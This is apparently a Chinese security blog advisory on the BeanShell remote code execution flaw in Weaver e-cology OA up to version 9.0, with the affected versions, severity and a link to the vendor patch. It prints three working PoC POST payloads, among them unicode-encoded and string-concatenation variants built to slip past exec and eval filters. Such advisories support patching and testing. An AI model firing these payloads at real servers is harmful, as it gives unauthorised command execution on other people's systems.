泛微 ecology OA 遠程代碼執行漏洞BeanShell檢測與補丁(BSH漏洞)

事件背景

2019年9月17日泛微OA官方更新了一個遠程代碼執行漏洞補丁,泛微e-cology OA系統的JAVA Beanshell接口可被未授權訪問,攻擊者調用該Beanshell接口,可構造特定的HTTP請求繞過泛微本身一些安全限制從而達成遠程命令執行,漏洞等級嚴重。

影響版本

e-cology <=9.0

威脅等級

高危

漏洞復現

泛微OA BeanShell復現測試:地址

print命令

 

exec命令

Post提交數據

Poc1:bsh.script=exec("whoami")
如果有全局過濾器過濾了exec或eval,會有報錯,可以採用unicode編碼、字符串拼接等方式繞過。

Poc2:bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.output=raw

Poc3:
bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\"command\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami

批量驗證腳本

該腳本組合了常用的泛微OA web路徑,加上本文講解繞過過濾器的3個Poc。該工具僅用於測試研究使用請勿他用。

地址 CSDN下載

泛微官方安全補丁

https://www.weaver.com.cn/cs/securityDownload.asp

免責聲明

本文中提到的漏洞利用Poc和腳本僅供研究學習使用,請遵守《網絡安全法》等相關法律法規。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章